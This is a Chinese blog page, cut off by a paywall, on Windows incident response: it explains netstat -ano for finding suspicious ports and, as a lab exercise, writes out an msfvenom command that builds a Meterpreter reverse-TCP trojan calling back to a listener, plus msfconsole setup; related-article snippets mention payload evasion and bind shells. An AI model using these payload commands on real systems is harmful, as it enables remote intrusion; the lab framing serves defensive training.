应急响应之Windows入侵排查

最新推荐文章于 2024-11-13 18:23:12 发布
最新推荐文章于 2024-11-13 18:23:12 发布
阅读量745 收藏 1
点赞数
分类专栏: 安全 文章标签: linux 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Jack_chao_/article/details/130038165
版权

当你没有思路的时候

就先查端口

 netstat是用于显示套接字内容的命令,-ano选项表示下列意思:

a:不仅显示正在通信的套接字,还显示包括尚未开通通信等状态的所有套接字

n:显示IP地址和端口号

o:显示使用该套接字程序的PID

比如,种一个MSF的一个木马吧

生成木马:

┌──(root💀kali)-[/var/www/html]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.242.140 LPORT=7777 -f exe >tcp.exe  
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes

开启监听

└─# msfconsole 
#打开msfconsole

可以利用侦听模块了,在msf下进入到侦听模块中 use exploit/multi/handle

<
最低0.47元/天 解锁文章
windows系统应急响应
Cwillchris的博客
09-29 2875
2、推荐工具:Window 下,推荐用 EmEditor 进行日志分析,支持大文本,搜索效率还不错。运行 Win+R,输入lusrmgr.msc 回车,通过本地用户和组的管理页面(或者“计算机管理”)的可以查看到隐藏账户。最后应急处置,当然是杀死进程并删除后门文件,执行命令taskkill /F /pid 1472。删除可疑用户,可以直接删除或用cmd命令net user hacker$ /del 删除。安装好LogParser后,cmd切换到LogParser安装目录,执行以下命令。
网络安全——应急响应Windows入侵排查
CoffeMilk的博客
11-08 986
网络安全所说的应急响应(Emergency Response)通常是指在突发事件发生后,为了减少损失和危害,迅速采取的一系列应对措施,保护生命财产安全,恢复正常秩序的过程。这里说的突发事件特指:影响系统(包含服务器主机和操作系统、网络范围)正常工作的情况(如:黑客入侵服务器、黑客劫持服务器、病毒爆发、系统异常宕机、应用服务瘫痪、信息窃取、DDOS攻击、网络流量异常等内容)
Windows 应急响应辅助笔记
VVzv的博客
10-09 2232
以下主要为一些Windows应急的排查方法,对于处置应急不要过于盲目无目的排查,如清楚入侵原因,可基于入侵行为来做于排查,比如服务器存在WebShell,那么排查着重点就应该放在网站根目录下可疑文件的排查(比如从文件创建时间来进行筛选),当然,如果要看攻击者入侵后做了什么事情,或者取证,可能就需要较为全面的分析。
应急响应笔记
weixin_46595570的博客
04-15 1296
黑客病毒千千万,人才工具处处有。 攻击威胁早发现,不留后门要根除。 面对各种各样的安全事件,我们该怎么处理? 当企业发生黑客入侵、系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,同时给出解决方案与防范措施,为企业挽回或减少经济损失。 对于病毒入侵,黑客攻击等等我们又知道多少? 所以在现实中会时不时出现不同的人,不同的手段攻击我们,这时我们就需要进行应急响应分析。 目录 分析入侵原因-
应急响应实战笔记_2020最新版.pdf
06-24
整体目录结构共六章,分为技巧篇和实战篇。第1~3章为技巧篇,分别对应入侵排查、日志分析和权限维持,第4~6章为实战篇,包含了Windows/Linux各种病毒木马,web入侵事件溯源处理过程。
网络安全——应急响应Linux入侵排查
最新发布
CoffeMilk的博客
11-13 1120
本文主要介绍关于Linux系统被入侵后的应急响应工作流程和排查内容
应急响应篇:windows入侵排查
yj520400的博客
03-21 1678
的存在,在入侵系统后,攻击者可以在计算机上开启专属的端口来访问被害主机或植入病毒用于挖矿等,熟悉计算机的朋友应该都知道常用的端口也就那么几个,所以通过排查可疑端口能确定主机是否存在后门、是否被植入挖矿病毒等,再根据端口的PID对可疑进程对应的程序排查,确定是否为恶意程序。webshell和病毒都是windows系统的大敌,它们可以维持攻击者的系统权限、盗窃资料、感染其他主机、加密文件等,对操作系统造成非常大的危害。而与此同时操作系统也会出现异常,包括账户、端口、进程、网络、启动、服务、任务以及文件等,
Windows应急响应-排查方式
网络空间安全学习
08-05 2156
网络安全应急响应(Network Security Incident Response,又称CSIRT)是指团队或组织为了在网络安全事件发生时能够及时准确地做出反应和应对而建立的一套制度和流程。其目的是降低网络安全事件所造成的损失并迅速恢复受影响的系统和服务。我这里总结了一些 Window 服务器应急响应的思路和方法,希望能对师傅们处理攻击事件或工作中的应急响应有所帮助。常见的应急响应事件分类:常见的应急响应事件可分为四类,如下。
windows应急响应基础知识
m0_58595840的博客
01-16 521
应急响应windows基础知识
Windows应急响应基础知识/常用方法
weixin_61355725的博客
08-27 921
无法仅使用名称进入文件夹(例如:cd …不起作用),必须使用cd …WebLogic 9及以后版本:WebLogic安装路径\user_projects\domains\\servers\\logs\。安全日志:用户权限的变化、文件和目录的访问、打印以及用户系统登陆和注销,如有效或无效的登陆尝试、与资源使用有关的事件。IIS日志通常存放在%systemroot%\system32\logfiles\W3SVC1\目录。日志的存储位置于: C:\Windows\System32\winevt\Logs。
红队技术-父进程欺骗(T1134)
YJ_12340的博客
10-20 1429
攻击者广泛使用该技术进行检测规避,并增加了应急响应人员检测IoC的时间。针对许多过时的和未打补丁的EDR解决方案,可以使用此技术轻松规避检测。通过本文,告诉大家在组织中应该使用最新的EDR解决方案以及在可以捕捉此类技术的优质产品中使用智能检测功能的重要性。
修改msfvenom unicode编码器的默认寄存器
qq726232111的博客
01-07 335
修改msfvenom unicode编码器的默认寄存器
kali攻防第13章 Metasploit之生成webshell及应用
安全参透之旅
12-24 6473
Metasploit之生成webshell及应用   准备工具 1、kali 系统 IP 10.10.10.131 2、受害者机子 IP 10.10.10.130 3、使用工具 Metasploit   步骤:   1、在msf生成asp脚本木马 root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.
msf linux/x64/meterpreter/bind_tcp记录实践
want的博客
10-07 2086
1.设置监听,从tcp的角度来,要服务端先启动,客户端才能连接. 生成payload,赋权并执行 root@kali:~# msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=223 -f elf>x [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x
msf生成的攻击载荷进行免杀处理
Solar's Blog
04-30 3808
使用MSF编码器避免被查杀的最佳方法之一就是使用MSF编码器(集成入msfvenom功能程序)对我们要生成的攻击载荷文件进行重新编码。MSF编码器是一个非常实用的工具,它能够改变可执行文件中的代码形状,让杀毒软件认不出它原来的样子,而程序功能不会受到任何影响。和电子邮件附件使用Base64重新编码类似,MSF编码器将原始的可执行程序进行编码,并生成一个新的二进制文件。当这个文件运行后,MSF编码器...
kali linux 黑别人电脑,如何使用 Kali Linux 黑掉 Windows
weixin_31188927的博客
05-13 1104
Kali Linux 派生自 Debian Linux,主要用于渗透测试,拥有超过 300 个的预安装好的渗透测试工具。Metasploit 项目中 Metasploit 框架支持 Kali Linux 平台,Metasploit 是一个用于开发和执行安全利用代码(security exploit)的工具。让咱们来使用 Kali Linux 来攻破 Windows 吧。请注意,我写这篇文章只是出于...
msfvenom生成远控木马
Leiyinghui的博客
06-26 1448
用于生成各种类型的恶意软件payload,可以生成针对不同操作系统和应用程序的恶意代码,如木马、后门、恶意软件等,msfvenom在目标机上执行后门,在本地监听上线。查看可执行的操作,根据描述内容选择所需的命令进行操作。
# 执行 DISM 命令时出错 87 未在此上下文中识别出 restorehealth 选项。解决方法
段子手168的博客
09-12 8402
# 执行 DISM 命令时出错 87 未在此上下文中识别出 restorehealth 选项。解决方法
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值